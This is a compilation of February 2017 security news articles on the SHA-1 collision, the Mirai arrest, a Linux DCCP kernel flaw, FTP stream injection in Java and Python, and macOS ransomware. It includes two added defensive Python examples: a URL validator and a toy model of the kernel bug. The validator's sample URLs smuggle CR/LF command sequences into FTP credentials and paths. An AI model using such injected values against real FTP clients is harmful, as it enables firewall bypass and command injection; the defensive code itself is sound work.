By far the most prolific ransomware detected during this period was CryptoWall, accounting for 91% of all ransomware infections detected. Cerber accounted for 6% of detections, and TorrentLocker for 3%. TeslaCrypt and Locky were also detected, but each at less than 1% of infections.

Mobile malware is a particular concern for the healthcare industry given the mobility of much of the workforce -- doctors and nurses spend much of their time moving between patients and visiting home patients. Android malware occupies all five top slots for mobile malware detected during Q4 2016. This is unsurprising given the prevalence of Android devices and the open nature of the operating system compared to that of iOS. "This could be due to the fact that Android devices allow users to easily install apps from 3rd party sources, which could sometimes be loaded with Android-based malware," notes the report.

By far the most prevalent mobile malware is Android/Qysly.B!tr. With around 4,700 detections during the period, this is twice the number of Android/Generic.Z.2E7279!tr detections (around 2,300).

IPS event detections show that the internet of things is becoming a major attack vector, especially for healthcare. Top spot goes to VxWorks.WDB.Agent.Debug.Service.Code.Execution with nearly 1.9 million hits. "VxWorks is an operating system for embedded devices," notes the report, "which includes medical devices such as CT/PET/X-ray instrumentation, infusion pumps, personal activity monitors, and many others." The vulnerability was discovered in 2010, but criminals clearly believe that not all devices will have been patched.

The second most prevalent IPS event (Web.Server.etc.passwd.Access) has just over 500,000 detections, probing for misconfigured Unix-based web servers that may expose operating system usernames from /etc/passwd. Third is SQLi attempts on web servers; fourth are attempts to exploit Netcore/Netis routers; and fifth is ShellShock.

The top botnet detected is Andromeda, comprising a loader that has both anti-VM and anti-debug features that downloads modules and updates from its C2 server. Andromeda has been around since 2011. Second is H-worm, a VBscript-based botnet that steals sensitive information. Third is Necurs, particularly associated with delivering the Locky ransomware.

Conficker, one of the largest botnets ever known and dating back to 2008 is still there at number four -- demonstrating that there are still many unpatched Windows systems around. Pushdo, at five, has also been around for several years. It is mostly associated with large spam campaigns.

The most frequently detected exploit kit is RIG, at 46%. "Coming in 2nd place at 23% is CK, followed by Angler (16%), Neutrino (12%) and other less popular exploit kits at 3%. Most of these exploit kits are used for ransomware distribution."

Most of the threats against the healthcare industry are associated in one way or another with ransomware -- due, says FortiGuard, "to the higher probability of collecting ransom when sensitive healthcare data is encrypted." But FortiGuard has also detected many old threats against targets that should have been patched long ago. Patching is a problem for all industries, but operational medical devices are like the OT in industrial operations: there is a reluctance to tinker with critical systems that are working and in constant use.


First SHA-1 Collision Attack Conducted by Google, CWI

23.2.2017 securityweek Attack
Researchers at Google and Centrum Wiskunde & Informatica (CWI) in the Netherlands have managed to conduct the first real world collision attack against SHA-1, creating two documents with different content but identical hashes.

SHA-1 was introduced in 1995 and the first attacks against the cryptographic hash function were announced a decade later. Attacks improved over the years and, in 2015, researchers disclosed a method that lowered the cost of an SHA-1 collision to $75,000-$120,000 using Amazon’s EC2 cloud over a period of a few months.

Despite steps taken by companies such as Google, Facebook, Microsoft and Mozilla to move away from SHA-1, the hash function is still widely used.

Google and CWI, which is the national research institute for mathematics and computer science in the Netherlands, have now managed to find a collision, demonstrating that these attacks have become increasingly practical. Their technique has been dubbed “SHA-1 shattered” or “SHAttered.”

“We were able to find this collision by combining many special cryptanalytic techniques in complex ways and improving upon previous work. In total the computational effort spent is equivalent to 2^63.1 SHA-1 compressions and took approximately 6,500 CPU years and 100 GPU years,” experts said in their paper.

While the task still required a large number of computations – nine quintillion (9,223,372,036,854,775,808) to be precise – the SHAttered attack is 100,000 times faster than a brute-force attack.

The first phase of the attack was run on a heterogeneous CPU cluster hosted by Google and spread across eight physical locations. The second and more expensive phase was run on a heterogeneous cluster of K20, K40 and K80 GPUs hosted by Google.

Researchers have calculated that conducting the second phase of the attack using Amazon’s cloud would cost roughly $560,000, but the cost can be reduced to $110,000 if the attacker is patient and takes advantage of Spot instances.

Google has demonstrated the attack by releasing two PDF files that have different content, but the same SHA-1 hash. In accordance with the company’s disclosure policy, the code that allows anyone to create such PDFs will be made available after 90 days.

These collisions can pose a serious threat to a wide range of systems, including digital certificates, email signatures, software updates, backup systems, and version control tools (e.g. Git).

In order to help users identify such attacks, a free online tool that scans for SHA-1 collisions in documents has been released on the shattered.io website. Protections have also been integrated into Gmail and Google Drive. However, Google and CWI hope this attack will convince the industry to speed up migration to SHA-256 and SHA-3.

“The attack still requires a large amount of computing on both CPUs and GPUs but is expected to be within the realm of ability for nation states or people who can afford the cloud computing time to mount a collision attack,” David Chismon, senior security consultant at MWR InfoSecurity, told SecurityWeek.

“Hopefully these new efforts of Google of making a real-world attack possible will lead to vendors and infrastructure managers quickly removing SHA-1 from their products and configuration as, despite it being a deprecated algorithm, some vendors still sell products that do not support more modern hashing algorithms or charge an extra cost to do so,” Chismon added. “However, whether this happens before malicious actors are able to exploit the issue for their benefit remains to be seen.”


Hacker Who Knocked Million Routers Offline Using MIRAI Arrested at London Airport
23.2.2017 thehackernews BotNet

British police have arrested a suspect in connection with the massive attack on Deutsche Telekom that hit nearly 1 Million routers last November.
Late last year, someone knocked down more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany, which affected the telephony, television, and internet service in the country.
Now, Germany's federal criminal police force (BKA) revealed today that the UK's National Crime Agency (NCA) reportedly arrested a 29-year-old British suspect at Luton airport in London on Wednesday, who is accused of being the mastermind behind the last year's attack.
In a statement, the German police said the last year's attack was especially severe and was carried out to compromise the home routers to enroll them in a network of hijacked machines popularly known as Botnet, and then offer the DDoS services for sale on dark web markets.
But ultimately, the attack created a denial-of-service situation, which resulted in more than 900,000 customers losing Internet connectivity for a while.
"From the outset, Deutsche Telekom cooperated with law enforcement agencies," BKA said. "Technical assistance was also provided by the Federal Office for Information Security (BSI) in the analysis of the malicious software used."
The Botnet of hacked machines is used to carry out "distributed denial of service" (DDoS) attacks to knock any site or server offline by sending them a larger number of rogue requests than they can handle.
It is believed that a modified version of the infamous Mirai malware – a piece of nasty IoT malware which scans for insecure routers, cameras, DVRs, and other IoT devices and enslaves them into a botnet network – was used to create service disruption.
Mirai is the same botnet that knocked the entire Internet offline last year, crippling some of the world's biggest and most popular websites.
The BKA got involved in the investigation as the attack on Deutsche Telekom was deemed to be a threat to the country's national communication infrastructure.
German police from the city of Cologne identified the suspect and issued the international arrest warrant.
The BKA said the cops would extradite the 29-year-old man to Germany to face charges of computer sabotage. If convicted, he can get a prison sentence of up to 10 years.
The department said it would release further information as the investigation progresses.


Google Achieves First-Ever Successful SHA-1 Collision Attack
23.2.2017 thehackernews Attack


SHA-1, Secure Hash Algorithm 1, a very popular cryptographic hashing function designed in 1995 by the NSA, is officially dead after a team of researchers from Google and the CWI Institute in Amsterdam announced today that they had carried out the first ever successful SHA-1 collision attack.
SHA-1 was designed in 1995 by the National Security Agency (NSA) as a part of the Digital Signature Algorithm. Like other hashes, SHA-1 also converts any input message to a long string of numbers and letters that serve as a cryptographic fingerprint for that particular message.
Collision attacks appear when the same hash value (fingerprint) is produced for two different messages, which then can be exploited to forge digital signatures, allowing attackers to break communications encoded with SHA-1.
The explanation is technically tricky, but you can think of it as an attacker who surgically alters their fingerprints in order to match yours, and then uses that to unlock your smartphone.
Researchers have been warning about the weakness of SHA-1 for over a decade, but the hash function remains widely used.
In October 2015, a team of researchers headed by Marc Stevens from the Centrum Wiskunde & Informatica (CWI) in the Netherlands had published a paper that outlined a practical approach to creating a SHA-1 collision attack – Freestart Collision.
At that time the experts estimated that the cost of an SHA-1 collision attack would cost between $75,000 and $120,000 using computing power from Amazon’s EC2 cloud over a period of a few months.
The Collision Attack 'SHAttered' the Internet

Google approached the same group of researchers, worked with them and today published new research detailing a successful SHA-1 collision attack, which they dubbed SHAttered and which costs just $110,000 to carry out on Amazon's cloud computing platform.
As proof of concept, the new research presents two PDF files [PDF1, PDF2] that have the same SHA1 hash, but display totally different content.
According to the researchers, the SHAttered attack is 100,000 times faster than a brute force attack, and the technique could be used to create collisions in Git file objects or even digital certificates.
"This attack required over 9,223,372,036,854,775,808 SHA1 computations. This took the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations," the researcher explains.
"While those numbers seem very large, the SHA-1 shattered attack is still more than 100,000 times faster than a brute force attack which remains impractical."
90-days for Services to Migrate to Safer Cryptographic Hashes
Despite being declared insecure by researchers over a decade ago, and despite Microsoft announcing in November 2013 that it would not accept SHA-1 certificates after 2016, SHA-1 has remained widely used across the Internet.
In fact, Git – the world's most widely used free open-source system for managing software development – relies on SHA-1 for data integrity.
So, it's high time to migrate to safer cryptographic hashes such as SHA-256 and SHA-3.
Google is planning to release the proof-of-concept (PoC) code in 90 days, which the company used for the collision attack, meaning anyone can create a pair of PDFs that hash to the same SHA-1 sum given two distinct images with some pre-conditions.
Therefore, Git and an unknown number of other widely used services that still rely on the insecure SHA1 algorithm have three months to replace it with the more secure one.
Meanwhile, Google and researchers have released a free detection tool that detects if files are part of a collision attack. You can find both the tool and much more information about the first collision attack at shattered.io.


Netflix releases the Stethoscope tool to improve security
23.2.2017 securityaffairs Security

Netflix has released the Stethoscope open source web application that provides recommendations for securing their devices.
Netflix has released Stethoscope, an open source web application that provides recommendations for securing computers, smartphones, and tablets.

Netflix intends to follow a “user focused security” approach that aims to provide employees information to improve their security posture, rather than relying on the enforcement of mandatory policies.

The vast majority of attacks against businesses target corporate users, causing security incidents and data breaches. Humans are the weakest link in the security chain; for this reason, Netflix decided to focus its approach on the users, considering “the true context of people’s work”.

The company believes that productivity could be improved if employees don’t have to deal with too many rules and processes. That is why the Netflix Stethoscope scans their devices and provides recommendations on security measures that should be taken, but allows them to perform the tasks on their own time.

The tool does not apply any corrective action itself; it leaves employees to perform the necessary steps to secure their systems.

“Stethoscope is a web application that collects information for a given user’s devices and gives them clear and specific recommendations for securing their systems.” reads the description of the tool. “By providing personalized, actionable information–and not relying on automatic enforcement–Stethoscope respects people’s time, attention, and autonomy, while improving our company’s security outcomes.”

Stethoscope analyzes several aspects of an employee’s device, including the presence of security software (firewall), disk encryption, automatic updates, operating system and software updates, screen lock, and jailbreaking or rooting.

This information is elaborated by the Stethoscope tool that rates them based on the criticality of the tasks to complete.


Netflix Stethoscope is a Python-based tool with a user interface developed with the React framework. The tool does not have its own data store; data sources are implemented as plugins, which keeps the application extensible and allows users to add new data sources and new security checks.

“The various data sources are implemented as plugins, so it should be relatively straightforward to add new inputs. We currently support LANDESK (for Windows), JAMF (for Macs), and Google MDM (for mobile devices).” continues the description from Netflix.

Facebook’s Osquery is likely to be the next data source added to Netflix Stethoscope.

The tool is an open project to which anyone can contribute; the Stethoscope source code is available on GitHub.


CVE-2017-6074 – a new 11-year old Linux Kernel flaw discovered
23.2.2017 securityaffairs Vulnerebility

Security expert discovered a new 11-year old privilege escalation vulnerability, tracked as CVE-2017-6074, in the Linux kernel.
A new privilege escalation vulnerability, tracked as CVE-2017-6074, has been discovered in the Linux kernel, and the astonishing news is that it is an 11-year old flaw.

The local privilege-escalation vulnerability, discovered by security researcher Andrey Konovalov, affects all the major Linux distributions, including Debian, OpenSUSE, Red Hat, and Ubuntu.

The flaw, which Konovalov found using syzkaller, a kernel fuzzing tool released by Google, resides in the DCCP (Datagram Congestion Control Protocol) implementation.

The Datagram Congestion Control Protocol (DCCP) is a message-oriented transport layer protocol that implements reliable connection setup, maintenance, and teardown, of an unreliable packet flow, and the congestion control of that packet flow.

The flaw is a use-after-free vulnerability in the way the Linux kernel’s “DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket.”

“In the current DCCP implementation an skb for a DCCP_PKT_REQUEST packet is forcibly freed via __kfree_skb in dccp_rcv_state_process if dccp_v6_conn_request successfully returns [3].” reads the description of the flaw published on the full disclosure mailing list.

“However, if IPV6_RECVPKTINFO is set on a socket, the address of the skb is saved to ireq->pktopts and the ref count for skb is incremented in dccp_v6_conn_request [4], so skb is still in use. Nevertheless, it still gets freed in dccp_rcv_state_process.”


An attacker who can control which object is allocated in the freed memory, and overwrite its contents, may be able to execute arbitrary code in the kernel.

“An attacker can control what object that would be and overwrite its content with arbitrary data by using some of the kernel heap spraying techniques. If the overwritten object has any triggerable function pointers, an attacker gets to execute arbitrary code within the kernel,” reads the full disclosure mailing list post about the vulnerability.

It is important to highlight that the CVE-2017-6074 flaw is a local issue that cannot be exploited by a remote attacker. In order to exploit the flaw, an attacker needs local account access on the system.

The CVE-2017-6074 vulnerability has already been patched in the mainline kernel; users can apply the patch and rebuild the kernel of their OS, or they can wait for the next kernel update from their Linux distribution provider.

In December 2016, security experts discovered another privilege-escalation vulnerability in the Linux kernel, tracked as CVE-2016-8655, that dated back to 2011.

The flaw was discovered by the security expert Phil Oester, who dubbed it ‘Dirty COW’. The flaw could be exploited by a local attacker to escalate privileges.

The name “Dirty COW” is due to the fact that it’s triggered by a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings.


Filecoder is the new MacOS ransomware distributed through bittorrent
23.2.2017 securityaffairs Virus

A few days ago experts at antivirus firm ESET spotted a new MacOS ransomware, a rarity in the threat landscape, but it has a serious problem.
Malware experts from antivirus vendor ESET have discovered a new file-encrypting ransomware, dubbed OSX/Filecoder.E, targeting MacOS that is being distributed through BitTorrent websites.

“Early last week, we have seen a new ransomware campaign for Mac. This new ransomware, written in Swift, is distributed via BitTorrent distribution sites and calls itself “Patcher”, ostensibly an application for pirating popular software.” reads the analysis published by ESET.
The bad news for the victims is that they will not be able to recover their files, even if they pay the ransom.

MacOS ransomware is not common in the threat landscape; this is the second such malware discovered by security experts, after researchers spotted the KeRanger threat in March 2016.

The OSX/Filecoder.E MacOS ransomware masquerades as a cracking tool for commercial software such as Adobe Premiere Pro CC and Microsoft Office for Mac. The fake cracking tool is being distributed as a BitTorrent download.

The malware researchers noted that the ransomware is written in Apple’s Swift programming language and appears to be the work of a novice malware writer (VXer).

The MacOS ransomware is hard to install on recent OS X and MacOS versions because the installer is not signed with a developer certificate issued by Apple.

The OSX/Filecoder.E MacOS ransomware generates a single encryption key for all files and then stores the files in encrypted ZIP archives. Unfortunately, the malicious code is not able to send the encryption key to a C&C server before the key is destroyed, which makes file decryption impossible.

The experts highlighted that the implementation of the encryption process is effective and makes it impossible to crack.

“There is one big problem with this ransomware: it doesn’t have any code to communicate with any C&C server. This means that there is no way the key that was used to encrypt the files can be sent to the malware operators.” continues the analysis.

“The random ZIP password is generated with arc4random_uniform which is considered a secure random number generator,” the analysis adds. “The key is also too long to brute force in a reasonable amount of time.”

At the time I was writing, monitoring of the Bitcoin wallet address used to receive the victims’ payments revealed that no one had paid the ransom.

Experts believe that the crooks behind OSX/Filecoder.E are likely interested in scamming the victims rather than managing a botnet.

“This new crypto-ransomware, designed specifically for macOS, is surely not a masterpiece. Unfortunately, it’s still effective enough to prevent the victims accessing their own files and could cause serious damage.” concludes the analysis.


Researchers exfiltrate data by blinking the LEDs on the hard drives
23.2.2017 securityaffairs Hacking

A team of Israeli researchers has devised a new technique to exfiltrate data from a machine by using malware that controls the hard drive LEDs.
Over the years, numerous studies have demonstrated that it is possible to exfiltrate data from air-gapped networks in various ways, and security experts have warned us to cover our webcams to avoid being spied on by sophisticated malware.

Now a group of researchers from Ben-Gurion University of the Negev’s Cyber Security Research Center has devised a new technique to exfiltrate data from a machine by using malware that controls the hard drive LEDs.

“We show that a malware can indirectly control the HDD LED, turning it on and off rapidly (up to 5800 blinks per second) – a rate that exceeds the visual perception capabilities of humans. Sensitive information can be encoded and leaked over the LED signals, which can then be received remotely by different kinds of cameras and light sensors.” reads the paper published by the researchers. “Compared to other LED methods, our method is unique, because it is also covert – the HDD activity LED routinely flickers frequently, and therefore the user may not be suspicious to changes in its activity.”

The malware transmits information by forcing the LED indicators to blink. The group of experts, led by the well-known researcher Mordechai Guri, was able to flash the LED at around 5,800 on/off cycles per second as a data channel, a speed that allows transferring 4 Kbps.

The attackers can force the LEDs to blink at a rate of up to 6,000 times per second, which is indiscernible to the human eye but potentially readable by light sensors.

“It’s possible for the attacker to do such fast blinking that a human never sees it,” explained Guri.

Of course, the attackers need to infect the target machine prior to the transmission.

The efficiency of the exfiltration technique depends on the capabilities of the receiver, which might be a digital SLR or high-end security camera (15 bps), a GoPro-level camera (up to 120 bps), a webcam or Google Glass Explorer (also 15 bps), or a smartphone camera (up to 60 bps).

The paper includes a table reporting the maximum bandwidth of the different receivers.

The researchers published a video PoC of the technique in which a drone equipped with a receiver exfiltrated the data by flying to a window through which the infected machine’s blinking disk LED was visible.

The experts explained that it is very simple to control the hard disk LED even though there is no generic API for it: the malware just needs to perform a series of read/write operations on the disk in order to make the LED blink at specific frequencies. On the other end, the receiver has to run software that interprets the signals.

The paper also shows the portion of pseudocode that performs the data transmission by flashing the HDD LED.

Even though the technique is very sophisticated, an obvious countermeasure is to put a cover over the computer’s LEDs; the experts mention other countermeasures, but let me suggest reading their interesting paper for further details.


Java has another critical vulnerability: the built-in FTP client can be abused

23.2.2017 SecurityWorld Vulnerabilities
The Java and Python runtimes do not properly validate FTP links, which may make it easier for attackers to break through some parts of a firewall and gain access to the local network.

Security researcher Alexander Klink revealed an interesting attack in which exploiting an XXE (XML External Entity) vulnerability in an application written in Java makes it possible to send e-mails.

XXE vulnerabilities can be exploited by tricking applications into parsing specially crafted XML files. These files force the XML parser to disclose sensitive information such as files, directory listings, or even information about the processes running on the server.

Klink described how the same type of vulnerability can confuse the Java runtime into initiating an FTP connection to a remote server by passing it an FTP URL in the form ftp://user:password@host:port/file.ext.

It turned out that the FTP client implementation built into Java does not filter the special CR and LF characters out of links and interprets them.

By inserting such characters into the username or password part of an FTP URL, Java's FTP client can be confused into executing malicious commands, and it can even pose as and partially behave like SMTP (the e-mail protocol), because the FTP and SMTP syntaxes are similar.

By exploiting an XXE vulnerability, Klink showed how easily an attacker can force a Java application to send an e-mail to an SMTP server.

"This attack is particularly interesting in a situation where you can send mail to an internal (often unsecured, perhaps even without a spam or malware filter) e-mail server from the machine that does the XML parsing," Klink explains in a blog post.

After Timothy Morgan, a researcher at Blindspot Security, learned about the vulnerability discovered by Klink, he decided to publish his knowledge of a similar attack that works in the FTP implementations of both Java and Python. This attack is much more serious, however, because it can break through a firewall.

Morgan calls the attack "FTP protocol stream injection via malicious URLs", and it likewise relies on injecting malicious commands into FTP because of the missing CR and LF filtering. Instead of injecting SMTP commands, however, Morgan abuses the FTP PORT command to trick the client into opening a data channel to the remote FTP server on a specific TCP port.

As the researcher points out, many Linux-based SPI firewalls, including commercial ones, support the classic FTP translation model and automatically open a TCP port and forward it to the FTP client's LAN IP address if they detect a PORT command in the FTP traffic from that client.

A similar attack pattern has been known for quite a few years, which is why the developers of conntrack, the Linux toolset that most firewalls use, added extra protection: the port is opened only if the PORT command appears at the very beginning of a TCP packet, which ensures that the client really sent the command.

This presents a twofold problem for the attacker: first they must discover the client's internal IP address in order to forge the PORT command, and then they must align the TCP packets between the client and the server so that the forged command lands at the beginning of a packet.

Morgan can accomplish both of these steps with his stream injection attacks and says he has personally built a working exploit, which, as an ethical hacker, he does not intend to publish until Oracle and Python fix the code of their built-in FTP clients.

"The entire attack (including the request used to determine the victim's internal IP address) can typically be carried out with just three SSRF attacks, which open one TCP port," Morgan wrote in a blog post. "Each additional SSRF attack can open another TCP port."

The vulnerability can be exploited in many ways, including against users with Java installed on their computers. Users do not even need to run a malicious Java application, because the exploit can also be delivered via Java Web Start.

"If a user visited a web page with malicious code and had Java installed, then even with Java applets disabled Java Web Start could be launched to parse a JNLP file," Morgan describes. "These files could contain malicious FTP URLs that trigger the bug."

Morgan reportedly tested the attack against his own Linux firewall running a recent kernel, and also against Palo Alto Networks and Cisco Systems firewalls. They proved vulnerable to the exploit.

"Although testing of commercial firewalls has been very limited so far, it seems likely that a significant portion of the firewalls in the world are vulnerable to FTP protocol stream injection," he writes.

The Java and Python developers have been informed of the problem, but until they fix their FTP client implementations, the researcher recommends that firewall vendors temporarily block classic FTP translation by default.

Users should uninstall Java from their systems, or at least disable the browser plug-in and remove the association of Java with the .jnlp extension. XML parsing in Java is currently quite vulnerable, so XXE vulnerabilities are very common on the platform, Morgan adds.
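The missing CR/LF filtering the article describes, written up as an added pre-flight check in Python (this is not the Java or Python standard-library FTP client code, nor Klink's or Morgan's code): any ftp:// URL whose user name, password, host, path or query contains CR, LF or NUL after percent-decoding is rejected before it ever reaches an FTP client. The sample URLs are constructed for the demonstration.

```python
from urllib.parse import urlsplit, unquote

# Characters that must never reach the FTP control channel from a URL:
# CR and LF terminate a command line, NUL is rejected for good measure.
CONTROL_CHARS = ("\r", "\n", "\0")


def _has_control_chars(text: str) -> bool:
    return any(ch in text for ch in CONTROL_CHARS)


def ftp_url_is_safe(url: str) -> bool:
    """Return True only for an ftp:// URL whose components, once
    percent-decoded, contain no CR/LF/NUL. Fails closed on anything else."""
    # Check the raw string first: recent Python versions make urlsplit()
    # silently strip \r and \n (and tabs) before parsing, so a raw newline
    # would otherwise vanish from the parsed components and slip past the
    # component check below.
    if _has_control_chars(url):
        return False
    parts = urlsplit(url)
    if parts.scheme.lower() != "ftp":
        return False            # only ftp:// URLs are covered by this check
    try:
        _ = parts.port          # a malformed port raises ValueError
    except ValueError:
        return False
    # The article's point: %0D%0A in the user name or password is decoded
    # by the client and lands on the control channel as a new command line.
    for component in (parts.username or "", parts.password or "",
                      parts.hostname or "", parts.path, parts.query):
        if _has_control_chars(unquote(component)):
            return False
    return True


# Constructed sample URLs, mapped to the verdict a correct check must give.
SAMPLE_URLS = {
    "ftp://user:password@host.example:21/file.ext": True,
    "ftp://user:pw@host.example/spaced%20name.ext": True,
    "ftp://user%0D%0Ax:password@host.example/file.ext": False,  # CRLF in user
    "ftp://user:pass%0aword@host.example/file.ext": False,      # LF in password
    "ftp://host.example/dir/%0d%0afile.ext": False,             # CRLF in path
    "ftp://user\r\nx:pw@host.example/file.ext": False,          # raw CRLF
    "http://host.example/file.ext": False,                      # not ftp://
}


def check_samples() -> dict:
    """Run the check over every constructed sample and return the verdicts."""
    return {url: ftp_url_is_safe(url) for url in SAMPLE_URLS}


if __name__ == "__main__":
    for url, verdict in check_samples().items():
        print(f"{'SAFE  ' if verdict else 'REJECT'} {url!r}")
```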


11-Year Old Linux Kernel Local Privilege Escalation Flaw Discovered
22.2.2017 thehackernews Vulnerebility

Another privilege-escalation vulnerability has been discovered in the Linux kernel that dates back to 2005 and affects major distributions of the Linux operating system, including Red Hat, Debian, OpenSUSE, and Ubuntu.
The over-a-decade-old Linux kernel bug (CVE-2017-6074) was discovered by security researcher Andrey Konovalov in the DCCP (Datagram Congestion Control Protocol) implementation using Syzkaller, a kernel fuzzing tool released by Google.
The vulnerability is a use-after-free flaw in the way the Linux kernel's "DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket."
The DCCP double-free vulnerability could allow a local unprivileged user to alter the Linux kernel memory, enabling them to cause a denial of service (system crash) or escalate privileges to gain administrative access on a system.
"An attacker can control what object that would be and overwrite its content with arbitrary data by using some of the kernel heap spraying techniques. If the overwritten object has any triggerable function pointers, an attacker gets to execute arbitrary code within the kernel," reads the Full Disclosure mailing list post about the vulnerability.
DCCP is a message-oriented transport layer protocol that minimizes the overhead of packet header size or end-node processing as much as possible and provides the establishment, maintenance and teardown of an unreliable packet flow, and the congestion control of that packet flow.
This vulnerability does not provide any way for an outsider to break into your system in the first place, as it is not a remote code execution (RCE) flaw and requires an attacker to have local account access on the system to exploit it.
Almost two months ago, a similar privilege-escalation vulnerability (CVE-2016-8655) was uncovered in Linux kernel that dated back to 2011 and allowed an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel.
The vulnerability has already been patched in the mainline kernel. So, if you are an advanced Linux user, apply the patch and rebuild kernel yourself.
OR, you can wait for the next kernel update from your distro provider and apply it as soon as possible.
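The reference-count mix-up described in both Linux kernel write-ups above (the Full Disclosure excerpts and this article), as an added toy model in Python; it is not kernel code and not from Konovalov's report. The function names mirror the kernel's skb_get, __kfree_skb and consume_skb, and the model assumes the mainline fix drops only the caller's own reference (consume_skb) instead of freeing unconditionally.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class ToySkb:
    """Stand-in for a kernel sk_buff: just a reference count and a freed flag."""
    users: int = 1          # sk_buff.users: the receive path starts with one ref
    freed: bool = False


@dataclass
class ToyInetRequestSock:
    """Stand-in for inet_request_sock; pktopts holds the saved skb pointer."""
    pktopts: Optional[ToySkb] = None


class UseAfterFree(Exception):
    """Raised when the model touches a buffer that has already been freed."""


def skb_get(skb: ToySkb) -> None:
    """Take an extra reference, like skb_get()."""
    skb.users += 1


def __kfree_skb(skb: ToySkb) -> None:
    """Unconditional release: frees no matter how many references remain."""
    skb.freed = True


def consume_skb(skb: ToySkb) -> None:
    """Reference-aware release: frees only when the last reference is dropped."""
    if skb.freed:
        raise UseAfterFree("double free")
    skb.users -= 1
    if skb.users == 0:
        skb.freed = True


def dccp_v6_conn_request(skb: ToySkb, ireq: ToyInetRequestSock,
                         recvpktinfo: bool) -> int:
    """Model of the IPV6_RECVPKTINFO branch: save the skb and hold a reference."""
    if recvpktinfo:
        ireq.pktopts = skb
        skb_get(skb)            # users is now 2: one for us, one for ireq
    return 0                    # 0 means success, as in the kernel


def dccp_rcv_state_process(skb: ToySkb, ireq: ToyInetRequestSock,
                           recvpktinfo: bool, fixed: bool) -> None:
    """The caller that releases the DCCP_PKT_REQUEST skb after the handler."""
    if dccp_v6_conn_request(skb, ireq, recvpktinfo) == 0:
        if fixed:
            consume_skb(skb)    # fix (assumed): drop only our own reference
        else:
            __kfree_skb(skb)    # the bug: freed although ireq still points at it


def release_request_sock(ireq: ToyInetRequestSock) -> None:
    """Later code that uses, then drops, the reference saved in pktopts."""
    if ireq.pktopts is not None:
        if ireq.pktopts.freed:
            raise UseAfterFree("ireq->pktopts points at a freed skb")
        consume_skb(ireq.pktopts)


def simulate(recvpktinfo: bool, fixed: bool) -> str:
    """Run one request through the model: 'ok', 'use-after-free' or 'leak'."""
    skb = ToySkb()
    ireq = ToyInetRequestSock()
    dccp_rcv_state_process(skb, ireq, recvpktinfo, fixed)
    try:
        release_request_sock(ireq)
    except UseAfterFree:
        return "use-after-free"
    return "ok" if skb.freed else "leak"


if __name__ == "__main__":
    for recvpktinfo in (False, True):
        for fixed in (False, True):
            print(f"IPV6_RECVPKTINFO={recvpktinfo!s:5} fixed={fixed!s:5} -> "
                  f"{simulate(recvpktinfo, fixed)}")
```

Only the combination of the option being set and the unconditional free produces the dangling pointer; the reference-aware release neither frees early nor leaks the buffer.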


Yahoo Slashes Price of Verizon Deal $350 Million After Data Breaches

22.2.2017 securityweek IT

NEW YORK - Yahoo slashed the price of the sale of its core Internet business to Verizon by $350 million following a pair of major data breaches at Yahoo, the two companies announced Tuesday.

Under the revised terms of the deal, Verizon's purchase of the Yahoo assets will now total $4.48 billion. Yahoo still faces probes and lawsuits related to the breaches, which affected more than 1.5 billion accounts.

The transaction had been delayed due to the hacks.

Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting more than a billion users.

Under the terms of the revised agreement, Yahoo will continue to cover the cost of a Securities and Exchange Commission probe into the breaches and shareholder lawsuits.

However, other government investigations and third-party litigation related to the breaches will be shared by Verizon and Yahoo.

"We have always believed this acquisition makes strategic sense," said Verizon executive vice president Marni Walden.

"We look forward to moving ahead expeditiously so that we can quickly welcome Yahoo's tremendous talent and assets into our expanding portfolio in the digital advertising space."

Prices of Yahoo shares rose 0.3 percent to $45.24, while Verizon gained 0.4 percent to $49.39.


Cisco Launches New Firepower Firewalls

22.2.2017 securityweek Safety

Cisco announced on Wednesday the launch of four new threat-focused Firepower next-generation firewalls (NGFWs) designed for banks, retailers and other businesses that conduct a high volume of sensitive transactions.

The new products are part of the Firepower 2100 series NGFWs, which provide throughput ranging between 1.9 and 8.5 Gbps, and support up to two dozen 1 Gigabit Ethernet (GE) ports or sixteen 10 GE ports.

According to Cisco, the new firewalls have a dual CPU, multi-core architecture designed to optimize firewall, cryptographic and threat inspection functionality.


“The design employs Intel multi-core CPUs for Layer 7 threat inspections (app visibility, intrusion detection, URL filtering, malware and file inspection, user identity, etc.) and a combination of merchant and a Network Processing Unit (NPU) for layer 2-4 traffic (stateful firewall, NAT, VPN-SSL encryption/decryption, and more),” explained Cisco’s David Stuart.

The networking giant says firewalls typically slow down throughput performance by up to 50 percent with intrusion prevention functionality fully enabled, but claims its new product can have a less than one percent impact.

Cisco also announced that it has made some improvements to its local, centralized and cloud-based management tools. This includes a web-based interface in the Firepower Device Manager to help users quickly deploy appliances via a setup wizard.

It also includes enhancements to the Firepower Management Center (FMC), which allows users to automate various security tasks, such as assessments, tuning, containment and remediation. The FMC can now also automatically receive third-party and customer-specific intelligence via the Threat Intelligence Director (TID).

Finally, Cisco said its Cloud Defense Orchestrator, designed for cloud-based policy management, now supports the Cisco Web Security Appliance (WSA) v. 11 and is available via a Europe-based cloud.


Firefox Users Fingerprinted via Cached Intermediate CA Certificates

22.2.2017 securityweek Safety

An attacker can discover various details about Firefox users due to the manner in which the browser caches intermediate CA certificates, a researcher has discovered.

When the server doesn’t deliver the complete certificate chain, Firefox loads the website if the intermediate CA certificate is cached, security researcher Alexander Klink discovered. By determining which websites use the same intermediate, an attacker could figure out some details about the user, the researcher says.

Normally, root Certificate Authorities (CAs) don’t use the main root certificate to secure connections, but generate intermediate certificates instead. Web servers use these intermediates to generate certificates for each user, and deliver these (server certificates) to the browser along with the intermediate CA certificate when establishing a connection.

When a server is misconfigured, only the server certificate is sent, which should result in the user getting an error instead of the website. However, if the intermediate CA certificate has been already cached, the user will be able to connect. While Chrome and Internet Explorer don’t rely on the entire chain to deliver a website, Firefox does, but uses cached CAs even when in Private Mode, the researcher has discovered.

